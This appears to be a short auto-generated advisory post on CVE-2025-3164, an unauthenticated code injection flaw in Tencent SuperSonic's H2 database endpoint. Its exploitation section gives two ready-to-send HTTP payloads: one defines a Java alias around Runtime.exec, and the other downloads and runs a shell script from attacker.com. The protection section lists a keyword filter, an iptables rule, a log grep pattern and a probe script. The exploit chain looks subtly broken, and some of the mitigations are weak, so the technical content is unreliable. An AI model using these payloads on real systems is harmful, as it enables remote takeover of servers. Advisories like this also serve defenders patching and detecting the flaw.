Tencent Music Entertainment SuperSonic, Code Injection, CVE-2025-3164 (Critical)

By /

Listen to this Post

How CVE-2025-3164 Works

CVE-2025-3164 is a critical code injection vulnerability in Tencent Music Entertainment SuperSonic (up to v0.9.8). The flaw exists in the `/api/semantic/database/testConnect` endpoint, which handles H2 database connections. Attackers can exploit improper input validation to inject malicious code via crafted requests, leading to remote code execution (RCE). The H2 database component processes unsanitized user-supplied data, allowing arbitrary Java code execution due to insecure deserialization or script evaluation. The vulnerability is remotely exploitable with no authentication required in some configurations, making it highly dangerous.

DailyCVE Form:

Platform: Tencent SuperSonic
Version: ≤ 0.9.8
Vulnerability: Code Injection
Severity: Critical
Date: 04/23/2025

What Undercode Say:

Exploitation:

1. Craft malicious payload:

POST /api/semantic/database/testConnect HTTP/1.1
Host: target.com
Content-Type: application/json
{"jdbcUrl":"jdbc:h2:mem:;INIT=CREATE ALIAS EXEC AS 'String shellexec(String cmd) throws java.io.IOException {Runtime.getRuntime().exec(cmd); return \"ok\";}'"}

2. Trigger RCE:

POST /api/semantic/database/testConnect HTTP/1.1
Host: target.com
Content-Type: application/json
{"jdbcUrl":"jdbc:h2:mem:;CALL EXEC('curl attacker.com/shell.sh -o /tmp/shell && chmod +x /tmp/shell && /tmp/shell')"}

Protection:

1. Patch: Upgrade to SuperSonic v0.9.9+.

2. Input Validation:

if (jdbcUrl.contains("INIT") || jdbcUrl.contains("CALL")) {
throw new SecurityException("Malicious input detected");
}

3. Network Controls:

Block unauthorized H2 commands via WAF
iptables -A INPUT -p tcp --dport 8080 -m string --string "jdbc:h2:mem:;INIT" -j DROP

4. Log Monitoring:

grep -E "jdbc:h2:mem:;INIT|CALL EXEC" /var/log/supersonic/access.log

5. Mitigation: Disable H2 remote connections if unused:

application.properties
spring.h2.console.enabled=false

6. Exploit Detection:

import requests
vuln_endpoint = "http://target.com/api/semantic/database/testConnect"
response = requests.post(vuln_endpoint, json={"jdbcUrl":"jdbc:h2:mem:;INIT=SELECT 1"})
if "H2" in response.text and response.status_code == 200:
print("Vulnerable to CVE-2025-3164")

Sources:

Reported By: nvd.nist.gov
Extra Source Hub:
Undercode

Join Our Cyber World:

💬 Whatsapp | 💬 TelegramFeatured Image

Scroll to Top